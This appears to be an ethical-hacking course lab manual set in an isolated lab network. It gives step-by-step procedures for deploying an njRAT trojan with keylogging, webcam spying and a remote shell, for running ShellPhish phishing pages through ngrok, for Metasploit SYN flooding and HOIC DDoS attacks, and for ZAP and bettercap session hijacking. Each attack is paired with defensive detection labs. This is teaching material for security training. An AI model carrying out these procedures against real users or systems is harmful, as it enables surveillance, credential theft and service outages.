4. The selected file will be sent to the VirusTotal server for analysis.
5. VirusTotal returns a detailed report displaying the result of each anti-virus for the
selected tini.exe malicious file under the DETECTION tab, as shown in the screenshot.

Page| 41
6. Now, click the DETAILS tab to view the malicious file details such as Basic Properties,
History, Names, Portable Executable Info, Sections, Imports, and ExifTool File Metadata.
7. Click the RELATIONS tab to view Execution Parents, PE Resource Parents, Contained in
Graphs, and Graph Summary. Scroll down to view other details.
8. To view Graph Summary, you will need a VirusTotal account.
9. Click the BEHAVIOR tab to view the File System Actions, Process and Service Actions,
Shell Commands, and Synchronization Mechanisms & Signals.
10. Close the web browser once the analysis is complete.

You can also use other local and online malware scanning tools such as Hybrid
Analysis (https://www.hybrid-analysis.com), Cuckoo
Sandbox (https://cuckoosandbox.org), Jotti (https://virusscan.jotti.org), or Valkyrie
Sandbox (https://valkyrie.comodo.com) to perform online malware scanning

Page| 42
EXPERIMENT 7
A
Lab 1: Gain Access to the Target System using Trojans
Lab Scenario

Trojan horses deceive users into triggering malicious actions on their computers, granting
attackers unrestricted access to sensitive data. These attacks often occur through seemingly
harmless downloads or clicks, enabling the Trojan to operate with the same privileges as the
victim. This can lead to data loss, unauthorized access, and further exploitation of system
vulnerabilities. Security measures, including proper antivirus configuration and network
assessments by experts, are crucial to prevent Trojan attacks. Lab exercises illustrate the ease with
which hackers can compromise systems and establish covert communication channels for data
transfer.

Lab Objectives

• Gain control over a victim machine using the njRAT RAT Trojan

Task 1: Gain Control over a Victim Machine using the njRAT RAT
Trojan

Attackers use Remote Access Trojans (RATs) like njRAT to gain control of target machines
surreptitiously. RATs enable remote access to the victim's computer, allowing the attacker to
perform various malicious actions, including keylogging, file access, and webcam spying. njRAT,
in particular, is adept at stealing data, accessing cameras, stealing browser credentials, and
controlling Botnets. It can be manipulated to spread through USB drives, providing attackers with
extensive control over infected systems.

Using njRAT, we'll take control of a Windows Server 2016 machine (10.10.10.16) from a Windows
10 attacker machine (10.10.10.10) in this lab. Note that client versions and website appearances
may vary, but the server and client creation process remains the same.

1. By default, Windows 10 machine selected, click Ctrl+Alt+Delete .

2. By default, Admin user profile is selected, click Pa$$w0rd to paste the password in the
Password field and press Enter to login.
3. Navigate to D:\CEH-Tools\CEHv11 Module 07 Malware Threats\Trojans
Types\Remote Access Trojans (RAT)\njRAT and double-click njRAT v0.7d.exe.
4. The njRAT GUI appears along with an njRAT pop-up, where you need to specify the port
you want to use to interact with the victim machine. Enter the port number and click Start.
5. Access the njRAT GUI, click on the Builder link, input the Windows 10 (attacker machine) IP
address in the Host field, select Registry Startup, keep other settings default, and click Build.

Page| 43
6. In the Save As window, specify a storage location for the server, rename it, and click Save
(e.g., in this lab, the Desktop is chosen, and the file is named Test.exe). Once created, click
OK on the DONE! pop-up to finish. Now, the server can be sent to the target through email
or any other means as per the attacker's method.
7. Click Windows Server 2016 to switch to the Windows Server 2016 machine.
8. Navigate to the shared network location (CEH-Tools), and then Copy and Paste the
executable file (Test.exe) onto the Desktop of Windows Server 2016.
9. Unless the attacker working on the Windows 10 machine disconnects the server on
their own, the victim machine remains under their control.
10. The GUI displays the machine’s basic details such as the IP address, User name, and Type
of Operating system.
11. Right-click on the detected victim name and click Manager.
12. Double-click any directory in the left pane (here, ProgramData); all its associated files
and directories are displayed in the right pane. You can right-click a selected directory and
manipulate it using the contextual options.

13. Click on Process Manager. You will be redirected to the Process Manager, where you
can right-click on a selected process and perform actions such as Kill, Delete, and Restart.

14. Click on Connections, select a specific connection, right-click on it, and click Kill
Connection. This kills the connection between two machines communicating through a
particular port.

Page| 44
15. Click on Registry, choose a registry directory from the left pane, and right-click on its
associated registry files.
16. A few options appear for the files; you can use these to manipulate them.
17. Click Remote Shell. This launches a remote command prompt for the victim machine
(Windows Server 2016).
18. Type the command ipconfig/all and press Enter.
19. This displays all interfaces related to the victim machine, as shown in the screenshot.
20. Similarly, you can issue all other commands that can be executed in the command
prompt of the victim machine.

21. Now, right-click on the victim name, click Run File, and choose an option from the drop-
down list to execute scripts or files remotely from the attacker machine.
22. Right-click on the victim name, and then select Remote Desktop.
23. This launches a remote desktop connection without the victim’s awareness.
24. A Remote Desktop window appears; hover the mouse cursor to the top-center area of
the window. A down arrow appears; click it.
25. A remote desktop control panel appears; check the Mouse option.

Page| 45
26. Remotely interact with the victim's machine using the mouse. For file creation or script
writing, check the Keyboard option. After completing the task, close the Remote Desktop
window. Additionally, right-click on the victim's name, choose Remote Cam and
Microphone to spy on them and monitor voice conversations.

Page| 46
 27. Switch to Windows 10, right-click on the victim's name, and select Keylogger. Once the
Keylogger window appears, it displays all the keystrokes made by the victim on the

Windows Server 2016 machine.

28. After the attacker sends a message, a pop-up appears on the victim's screen (Windows
Server 2016).
29. Despite the victim's attempt to close the chatbox, it remains open as long as the attacker
is connected; even restarting the machine breaks the njRAT connection.
30. Upon the victim's login, njRAT automatically re-establishes the connection, allowing the
attacker to resume remote access and perform malicious activities.

Perform Static Malware Analysis

Lab Objectives

• Perform online malware scanning using VirusTotal

• Perform a strings search using BinText
• Identify packing and obfuscation methods using PEid

Overview of Static Malware Analysis

Static Malware Analysis, or code analysis, involves scrutinizing executable binary code without
execution to understand the malware's purpose. It utilizes tools and techniques like file
fingerprinting, malware scanning, string searches, identifying packing and obfuscation methods,
finding portable executable information, recognizing file dependencies, and malware

Page| 47
disassembly. This process gathers information such as file name, MD5 checksums, file type, size,
and reveals details about functionality, network signatures, exploit packaging, and dependencies.

Task 1: Perform Online Malware Scanning using VirusTotal

VirusTotal, a free service, swiftly detects viruses, worms, Trojans, and malware by analyzing
suspicious files and URLs. It acts as an information aggregator, gathering data from various
antivirus engines, website scanners, and user contributions. The malware signatures are regularly
updated every 15 minutes, ensuring the latest sets are utilized. VirusTotal aids ethical hackers
and penetration testers in identifying malicious content by analyzing files and URLs through its
comprehensive data aggregation.

1. Select Admin user profile is selected, click Pa$$w0rd to paste the password in the
Password field and press Enter to login.
2. Open any web browser (here, Google Chrome).In the address bar of the browser place
your mouse cursor and click https://www.virustotal.com and press Enter.
3. The VirusTotal main analysis site appears; click Choose file to upload a virus file.

4. The Open window appears; navigate to D:\CEH-Tools\CEHv11 Module 07 Malware

Threats\Viruses, select tini.exe, and click Open.

Page| 48
5. The selected file will be sent to the VirusTotal server for analysis.
6. VirusTotal returns a detailed report displaying the result of each anti-virus for the
selected tini.exe malicious file under the DETECTION tab, as shown in the screenshot.

7. Now, click the DETAILS tab to view the malicious file details such as Basic Properties,
History, Names, Portable Executable Info, Sections, Imports, and ExifTool File Metadata.

Page| 49
8. Click the RELATIONS tab to view Execution Parents, PE Resource Parents, Contained in
Graphs, and Graph Summary. Scroll down to view other details.

9. Click the BEHAVIOR tab to view the File System Actions, Process and Service Actions,
Shell Commands, and Synchronization Mechanisms & Signals.

Page| 50
10. Close the web browser once the analysis is complete.
11. You can also use other local and online malware scanning tools such as Hybrid
Analysis (https://www.hybrid-analysis.com), Cuckoo
Sandbox (https://cuckoosandbox.org), Jotti (https://virusscan.jotti.org), or Valkyrie
Sandbox (https://valkyrie.comodo.com) to perform online malware scanning.

Page| 51
EXPERIMENT 8
1.2 Perform Phishing using ShellPhish
Steps:

1. Open Firefox in Kali Linux

2. Go to Github and search for shell phish
3. Select the first repository
4. Click on the Clone or Download button and copy the URL
5. Open your Terminal
6. Type git clone URL and paste the URL you have copied, then press Enter.
7. It will start downloading the shellphish file.

8. When the download is complete, change your directory to shellphish by typing cd shellphish.

9. In the Shellphish directory, typing command ls -l will show all files and their permissions.

10. Now, what we will need to change is the permissions of shellphish. sh

11. As you can see, its permissions are (-rw-r–r– ). By (-r), it means (read) permission; by (w). it means
(write) permission
12. There is no execute permission, i.e., x. To add an execute permission, we need to give command chmod
+x shellphish.sh, which provides it with new permission (x).

13. Now, we can execute it by typing ./shellphish.sh

14. Shellphish has started. Choose any option from above just by typing the number; e.g., if I want to make
an Instagram phishing page, I will type (1) as insta is written on number one.

Page| 52
15. Then, choose a port forwarding service that will give you the phishing URL. I will go with ngrok, so I
typed 2.

16. If I use it for the first time, it will start downloading ngrok. Please wait for it.
17. When the download is complete, it will present a URL, which is the URL we will use to phish our
target.

18. Next, this link can be sent via email, WhatsApp, Messenger, or any other media.
19. When the target clicks on this link, you will get the location and IP address
20. After that, the page will open. When the target types his/her username and password, it will be sent to
the attacker. Then the target will be redirected to their Instagram.

Page| 53
 21. Because of TOR, the location is unknown, but the location shown will be the exact location of the
target otherwise. Notice: This article is for ethical hacking and educational purposes only. If you’re
interested, click here to start a career in ethical hacking.

2.1 Detect Phishing using Netcraft

1. 1. Visit the Netcraft Website: Go to the official Netcraft website at h"ps://www.netcra/.com/.

2. Access the Phishing Site Feed: Netcraft provides a Phishing Site Feed that you can use to check if a
website is listed as a known phishing site. Navigate to the "Phishing Site Feed" section on the Netcraft
website.

3. Subscribe to the Phishing Site Feed: To access the most up-to-date information, consider subscribing
to the Netcraft Phishing Site Feed. This feed provides real-time data on phishing websites that Netcraft
has identified.

4. Use Netcraft Browser Extensions: Netcraft offers browser extensions for popular browsers like
Chrome and Firefox. These extensions can provide real-time protection by blocking access to known
phishing sites. Install the Netcraft extension for your preferred browser.

5. Check Site Information: Netcraft provides a service where you can enter the URL of a website to
check if it is listed in their phishing database. Visit the "Check site" section on the Netcraft website,
enter the URL, and review the results.

6. Analyze Netcraft's Site Reports: Netcraft generates detailed reports for websites, including
information about the site's history, hosting details, and whether it has been involved in any phishing
activities. Use these reports to make informed decisions about the legitimacy of a website.

7. Stay Informed: Phishing sites are dynamic, and new ones emerge regularly. Stay informed about the
latest phishing threats by regularly checking Netcraft's resources, subscribing to updates, and following
any alerts or warnings provided by the service.

8. Report Suspected Phishing Sites: If you come across a website that you suspect is a phishing site and
it is not listed in Netcraft's database, report it to Netcraft. They actively encourage user participation in
identifying and reporting phishing sites to enhance their database.

Page| 54
EXPERIMENT 9
Tasks 1: Perform a DoS A_ack (SYN Flooding) on a Target
Host using Metasploit
SYN flooding takes advantage of a flaw with regard to how most hosts implement the TCP three-
way handshake. This attack occurs when the intruder sends unlimited SYN packets (requests) to
the host system. The process of transmitting such packets is faster than the system can handle.
Normally, the connection establishes with the TCP three-way handshake, and the host keeps
track of the partially open connections while waiting in a listening queue for response ACK
packets.

Metasploit is a penetration testing platform that allows a user to find, exploit, and validate
vulnerabilities. Also, it provides the infrastructure, content, and tools to conduct penetration tests
and comprehensive security auditing. The Metasploit framework has numerous auxiliary module
scripts that can be used to perform DoS attacks.

Here, we will use the Metasploit tool to perform a DoS attack (SYN flooding) on a target host.

In this task, we will use the Parrot Security (10.10.10.13) machine to perform SYN flooding on
the Windows 10 (10.10.10.10) machine through port 21.

1. In the login page, the attacker username will be selected by default. Enter password
as toor in the Password field and press Enter to log in to the machine..
2. Click the MATE Terminal icon at the top of the Desktop window to open
a Terminal window.
o If a Question pop-up window appears asking for you to update the machine,
click No to close the window.

3. A Parrot Terminal window appears. In the terminal window, type sudo su and
press Enter to run the programs as a root user.
4. In the [sudo] password for attacker field, type toor as a password and press Enter.

The password that you type will not be visible.

5. Now, type cd and press Enter to jump to the root directory.

Page| 55
6. First, determine whether port 21 is open or not. This involves using Nmap to determine
the state of the port.
7. On the Parrot Terminal window, type nmap -p 21 (Target IP address) (here, target IP
address is 10.10.10.10 [Windows 10]) and press Enter.

-p: specifies the port to be scanned.

8. The result appears, displaying the port status as open, as shown in the screenshot.

If the port in your lab environment turns out to be closed, look for an open port using
Nmap.

Page| 56
9. Now, we will perform SYN flooding on the target machine (Windows 10) using port 21.
10. In this task, we will use an auxiliary module of Metasploit called synflood to perform a
DoS attack on the target machine.
11. Type msfconsole from a command-line terminal and press Enter to launch msfconsole.

12. In the msf command line, type use auxiliary/dos/tcp/synflood and press Enter to
launch a SYN flood module.

Page| 57
13. Now, determine which module options need to be configured to begin the DoS attack.
14. Type show options and press Enter. This displays all the options associated with the
auxiliary module.

15. Here, we will perform SYN flooding on port 21 of the Windows 10 machine by spoofing
the IP address of the Parrot Security machine with that of the Windows Server 2019
(10.10.10.19) machine.
16. Issue the following commands:
o set RHOST (Target IP Address) (here, 10.10.10.10)
o set RPORT 21
o set SHOST (Spoofable IP Address) (here, 10.10.10.19)
By setting the SHOST option to the IP address of the Windows Server 2019 machine, you are
spoofing the IP address of the Parrot Security machine with that of Windows Server 2019.

Page| 58
17. Once the auxiliary module is configured with the required options, start the DoS attack
on the Windows 10 machine.
18. To do so, type exploit and press Enter. This begins SYN flooding the Windows
10 machine.

19. To confirm, click Windows 10 to switch to the Windows 10 machine and

click Ctrl+Alt+Delete . By default, Admin user profile is selected, click Pa$$w0rd to paste the
password in the Password field and press Enter to login.

Page| 59
 Alternatively, you can also click Pa$$w0rd under Windows 10 machine thumbnail in
the Resources pane or Click Type Text | Type Password button under Commands
(thunder icon) menu.
If Welcome to Windows wizard appears, click Continue and in Sign in with
Microsoft wizard, click Cancel.
Networks screen appears, click Yes to allow your PC to be discoverable by other PCs and
devices on the network.

20. Double-click Wireshark shortcut present on the Desktop.

21. The Wireshark Network Analyzer window appears. Double-click on the primary
network interface (here, Ethernet 2) to start capturing the network traffic.

The network interface might differ in your lab environment.

22. Wireshark displays the traffic coming from the machine. Here, you can observe that
the Source IP address is that of the Windows Server 2019 (10.10.10.19) machine. This
implies that the IP address of the Parrot Security machine has been spoofed.

23. Observe that the target machine (Windows 10) has drastically slowed, implying that the
DoS attack is in progress on the machine. If the attack is continued for some time, the
machine’s resources will eventually be completely exhausted, causing it to stop responding.
24. Once the performance analysis of the machine is complete, click on Parrot Security to
switch to the Parrot Security machine and press Ctrl+C to terminate the attack.

Page| 60
25. This concludes the demonstration of how to perform SYN flooding on a target host
using Metasploit.

Close all open windows and document all the acquired information.

Detect and Protect against DDoS A_ack using An/ DDoS

Guardian
Anti DDoS Guardian is a DDoS attack protection tool. It protects IIS servers, Apache serves, game
servers, Camfrog servers, mail servers, FTP servers, VOIP PBX, and SIP servers and other systems.
Anti DDoS Guardian monitors each incoming and outgoing packet in Real-Time. It displays the
local address, remote address, and other information of each network flow. Anti DDoS Guardian
limits network flow number, client bandwidth, client concurrent TCP connection number, and TCP
connection rate. It also limits the UDP bandwidth, UDP connection rate, and UDP packet rate.

Here, we will detect and protect against a DDoS attack using Anti DDoS Guardian.

In this task, we will use the Windows Server 2019 and Windows Server 2016 machines to
perform a DDoS attack on the target system, Windows 10.

1. On the Windows 10 machine, navigate to D:\CEH-Tools\CEHv11 Module 10 Denial-

of-Service\DoS and DDoS Protection Tools\Anti DDoS Guardian and double
click Anti_DDoS_Guardian_setup.exe.

If a User Account Control pop-up appears, click Yes.

Page| 61
2. The Setup - Anti DDoS Guardian window appears; click Next. Follow the wizard-driven
installation steps to install the application.
3. In the Stop Windows Remote Desktop Brute Force wizard, uncheck the install Stop
RDP Brute Force option, and click Next.
4. The Select Additional Tasks wizard appears; check the Create a desktop
shortcut option, and click Next.
5. The Ready to Install wizard appears; click Install.
6. The Completing the Anti DDoS Guardian Setup Wizard window appears; uncheck
the Launch Mini IP Blocker option and click Finish.
7. The Anti-DDoS Wizard window appears; click Continue in all the wizard steps, leaving
all the default settings. In the last window, click Finish.
8. Click Show hidden icons from the bottom-right corner of Desktop and click the Anti
DDoS Guardian icon.
9. The Anti DDoS Guardian window appears, displaying information about incoming and
outgoing traffic, as shown in the screenshot.

10. Now, click Windows Server 2019 to switch to the Windows Server 2019 and
click Ctrl+Alt+Delete to activate the machine. By default, Administrator profile is selected,
click Pa$$w0rd to enter the password and press Enter to log in.

11. Navigate to Desktop, open the High Orbit Ion Cannon (HOIC) folder, and double-
click hoic2.1.exe.

Page| 62
 If an Open File - Security Warning pop-up appears, click Run.

12. The HOIC GUI main window appears. Click the “+” button below the TARGETS section.

13. The HOIC - [Target] pop-up appears. Type the target URL such as http://[Target IP
Address] (here, the target IP address is 10.10.10.10 [Windows 10]) in the URL field. Slide
the Power bar to High. Under the Booster section, select GenericBoost.hoic from the
drop-down list and click Add.

14. Set the THREADS value to 20 by clicking the > button until the value is reached.

Page| 63
15. Now, click Windows Server 2016 to switch to Windows Server 2016 and
click Ctrl+Alt+Delete to activate the machine. By default, CEH\Administrator profile is
selected, click Pa$$w0rd to enter the password and press Enter to log in. Follow Steps 12 -
15 to launch and configure HOIC.
16. Once HOIC is configured on both machines, switch to each machine (Windows Server
2019 and Windows Server 2016) and click the FIRE TEH LAZER! button to initiate the
DDoS attack on the target Windows 10 machine.

To switch to the Windows Server 2019, click Windows Server 2019.

To switch to the Windows Server 2016, click Windows Server 2016.

17. Observe that the Status changes from READY to ENGAGING, as shown in the
screenshot.

Page| 64
18. Click Windows 10 to switch back to the Windows 10 machine and observe the packets
captured by Anti DDoS Guardian.
19. Observe the huge number of packets coming from the host machines (10.10.10.19
[Windows Server 2019] and 10.10.10.16 [Windows Server 2016]).

20. Double-click any of the sessions 10.10.10.19 or 10.10.10.16.

Here, we have selected 10.10.10.16. You can select either of them.

21. The Anti DDoS Guardian Traffic Detail Viewer window appears, displaying the content
of the selected session in the form of raw data. You can observe the high number of
incoming bytes from Remote IP address 10.10.10.16, as shown in the screenshot.

Page| 65
22. You can use various options from the left-hand pane such as Clear, Stop Listing, Block
IP, and Allow IP. Using the Block IP option blocks the IP address sending the huge number
of packets.
23. In the Traffic Detail Viewer window, click Block IP option from the left pane.

24. Observe that the blocked IP session turns red in the Action Taken column.

25. Similarly, you can Block IP the address of the 10.10.10.19 session.
26. On completion of the task, click FIRE TEH LAZER! again, and then close the HOIC
window on all attacker machines (Windows Server 2019 and Windows Server 2016).

Page| 66
 To switch to the Windows Server 2019, click Windows Server 2019.
To switch to the Windows Server 2016, click Windows Server 2016.

27. This concludes the demonstration of how to detect and protect against a DDoS attack
using Anti DDoS Guardian.
28. Close all open windows and document all the acquired information.
29. You can also use other DoS and DDoS protection tools such as Imperva Incapsula
DDoS Protection (https://www.incapsula.com), DOSarrest’s DDoS protection
service (https://www.dosarrest.com), DDoS-GUARD (https://ddos-guard.net),
and Cloudflare (https://www.cloudflare.com) to protect organization’s systems and
networks from DoS and DDoS attacks.
30. Navigate to Control Panel --> Programs --> Programs and Features and
uninstall Anti DDoS Guardian.

Page| 67
Experiment – 10

Hijack a Session using Zed A9ack Proxy (ZAP)

Zed Attack Proxy (ZAP) is an integrated penetration testing tool for finding vulnerabilities in
web applications. It offers automated scanners as well as a set of tools that allow you to find
security vulnerabilities manually. It is designed to be used by people with a wide range of
security experience, and as such is ideal for developers and functional testers who are new to
penetration testing.

ZAP allows you to see all the requests you make to a web app and all the responses you
receive from it. Among other things, it allows you to see AJAX calls that may not otherwise
be outright visible. You can also set breakpoints, which allow you to change the requests and
responses in real-time.

Here, we will hijack a session using ZAP. You will learn how to intercept the traffic of
victims’ machines with a proxy and how to view all the requests and responses from them.

Before starting this task, we need to configure the proxy settings in the victim’s machine,
which in this lab will be the Windows 10 machine.

1. By default, Windows 10 machine selected, click Ctrl+Alt+Delete .

Alternatively, you can also click Ctrl+Alt+Delete button under Windows 10 machine
thumbnail in the Resources pane or Click Ctrl+Alt+Delete button under Commands
(thunder icon) menu.

2. By default, Admin user profile is selected, click Pa$$w0rd to paste the password in
the Password field and press Enter to login.

Alternatively, you can also click Pa$$w0rd under Windows 10 machine thumbnail in
the Resources pane or Click Type Text | Type Password button under Commands
(thunder icon) menu.
If Welcome to Windows wizard appears, click Continue. In the Sign in with
Microsoft wizard click Cancel to continue.
Networks screen appears, click Yes to allow your PC to be discoverable by other PCs
and devices on the network.

3. Open any web browser (here, Google Chrome), click the Customize and control
Google Chrome icon, and select Settings from the context menu.

4. On the Settings page, scroll down and click the Advanced option in the browser.

Page| 68
5. Scroll down to the System section and click Open your computer’s proxy
settings to configure a proxy.

6. A Windows 10 Settings window opens, with the Proxy settings in the right pane.
7. Under the Manual proxy setup section, make the following changes:
o Under the Use a proxy server op9on, click the Off buAon to switch it On.
o In the Address field, type 10.10.10.19 (the IP address of the aAacker’s machine).
o In the Port field, type 8080.
o Click Save.

8. After saving, close the Settings and browser windows. You have now configured the
proxy settings of the victim’s machine.
9. Click Windows Server 2019 to switch to the Windows Server 2019 machine.
Click Ctrl+Alt+Delete to activate the machine, by default, Administrator account is
selected, click Pa$$w0rd to enter the password and press Enter

10. Double-click the OWASP ZAP shortcut on Desktop to launch the application.

11. OWASP ZAP initialized and a prompt that reads Do you want to persist the ZAP
Session? appears. Select the No, I do not want to persist this session at this moment
in time radio button and click Start.

12. The OWASP ZAP main window appears. Click on the “+” icon in the right pane
and select Break from the options.

The Break tab allows you to modify a response or request when ZAP has caught it. It
also allows you to modify certain elements that you cannot modify through your
browser, including:
o The header
o Hidden fields
o Disabled fields
o Fields that use JavaScript to filter out illegal characters

Page| 69
13. The Break tab is added to your OWASP ZAP window.
14. To configure ZAP as a proxy, click the Settings icon from the toolbar.

15. In the Options window, click Local Proxies in the left pane. In the right pane, under
the Local Proxy section, type 10.10.10.19 (the IP address of the Windows Server

Page| 70
 2019 machine) in the Address field and set the Port value to the default, 8080;
click OK.

16. Click the Set break on all requests and responses icon on the main ZAP toolbar.
This button sets and unsets a global breakpoint that will trap and display the next
response or request from the victim’s machine in the Break tab.

The Set break on all requests and responses icon turns automatically from green to
red.

Page| 71
17. Now, click Windows 10 to switch back to the victim’s machine (Windows 10) and
launch the same browser in which you configured the proxy settings. In this lab, we have
configured the Google Chrome browser.
18. Place your mouse cursor in the address bar, click www.moviescope.com and
press Enter.
19. A message appears, stating that Your connection is not private. Click
the Advanced button.
20. On the next page, click Proceed to www.moviescope.com (unsafe) to open the
website.

21. Now, click Windows Server 2019 to switch back to the attacker machine (Windows
Server 2019) and observe that OWASP ZAP has begun to capture the requests of the
victim’s machine.
22. In Steps 18-20, we visited www.moviescope.com in the victim’s browser. Look in
the Break tab and click the Submit and step to next request or response icon on the
toolbar to capture the www.moviescope.com request.

Page| 72
23. A HTTP response appears; click the Submit and step to next request or
response icon on the toolbar.

24. Now, in the Break tab,

modify www.moviescope.com to www.goodshopping.com in all the captured GET
requests.

Page| 73
 If you find any URL starting with https, modify it to http.

25. Once you have modified the GET requests, click the Submit and step to next
request or response icon on the toolbar to forward the traffic to the victim’s machine.

26. Modify every HTTP request captured by OWASP ZAP until you see
the www.goodshopping.com page in the victim’s machine.

Page| 74
 You will need to switch back and forth from the victim’s machine to see the browser
status while you do this.

27. Now, click on Windows 10 to switch to the victim’s machine (Windows 10); the
browser displays the website that the attacker wants the victim’s machine to see (in this
example, www.goodshopping.com).

It takes multiple iterations to open the Good Shopping site in the victim’s machine.

28. The victim has navigated to www.moviescope.com, but now

sees www.goodshopping.com; while the address bar displays www. moviescope.com,
the window displays www.goodshopping.com.

29. Now, we shall change the proxy settings back to the default settings. To do so,
perform Steps 3-5 again.
30. In the Settings window, under the Manual proxy setup section in the right pane,
click the On button to toggle it back to Off, as shown in the screenshot.

Page| 75
31. This concludes the demonstration of performing session hijacking using ZAP.
32. Close all open windows and document all the acquired information.

Page| 76
Task 1: Detect Session Hijacking using Wireshark

Wireshark allows you to capture and interactively browse the traffic running on a network. The
tool uses WinPcap to capture packets, and so is only able to capture packets on networks that
are supported by WinPcap. It captures live network traffic from Ethernet, IEEE 802.11, PPP/HDLC,
ATM, Bluetooth, USB, Token Ring, Frame Relay, and FDDI networks. Security professionals can use
Wireshark to monitor and detect session hijacking attempts.

Here, we will use the Wireshark tool to detect session hijacking attacks manually on the target
system.

We will use the Parrot Security (10.10.10.13) machine to carry out a session hijacking attack on
the Windows 10 (10.10.10.10) machine.

1. Click Windows 10 to switch to the Windows 10 machine. In the Desktop, double-

click Wireshark shortcut.

2. The Wireshark Network Analyzer window opens. Double-click the primary network
interface (in this case, Ethernet 2) to start capturing network traffic.

3. Wireshark starts capturing network traffic. Leave it running.

4. Now, we shall launch a session hijacking attack on the target machine (Windows 10)
using bettercap.

Page| 77
 To do so, you may either follow Steps 8-18 below, or refer to Task 2 (Intercept HTTP Traffic
using bettercap) in Lab 1.

5. Click Parrot Security to switch to the Parrot Security machine.

6. Click the MATE Terminal icon at the top of the Desktop window to open
a Terminal window.

7. A Parrot Terminal window appears. In the terminal window, type sudo su and
press Enter to run the programs as a root user.
8. In the [sudo] password for attacker field, type toor as a password and press Enter.

The password that you type will not be visible.

9. Now, type cd and press Enter to jump to the root directory.

Page| 78
10. In the terminal window, type bettercap -iface eth0 and press Enter to set the network
interface.

-iface: specifies the interface to bind to (in this example, eth0).

Page| 79
11. Type net.probe on and press Enter. This module will send different types of probe
packets to each IP in the current subnet for the net.recon module to detect them.
12. Type net.recon on and press Enter. This module is responsible for periodically reading
the system ARP table to detect new hosts on the network.

The net.recon module displays the detected active IP addresses in the network. In real-time,
this module will start sniffing network packets.

13. Type net.sniff on and press Enter. This module is responsible for performing sniffing on
the network.
14. You can observe that bettercap starts sniffing network traffic on different machines in
the network, as shown in the screenshot.

15. Click Windows 10 to switch back to the Windows 10 machine and observe the huge
number of ARP packets captured by the Wireshark, as shown in the screenshot.

bettercap sends several ARP broadcast requests to the hosts (or potentially active hosts). A
high number of ARP requests indicates that the system at 10.10.10.13 (the attacker’s system
in this task) is acting as a client for all the IP addresses in the subnet, which means that all
the packets from the victim node (in this case, 10.10.10.10) will first go to the host system
(10.10.10.13), and then the gateway. Similarly, any packet destined for the victim node is
first forwarded from the gateway to the host system, and then from the host system to the
victim node.

Page| 80
 This concludes the demonstration of how to detect a session hijacking attack using
Wireshark.

Page| 81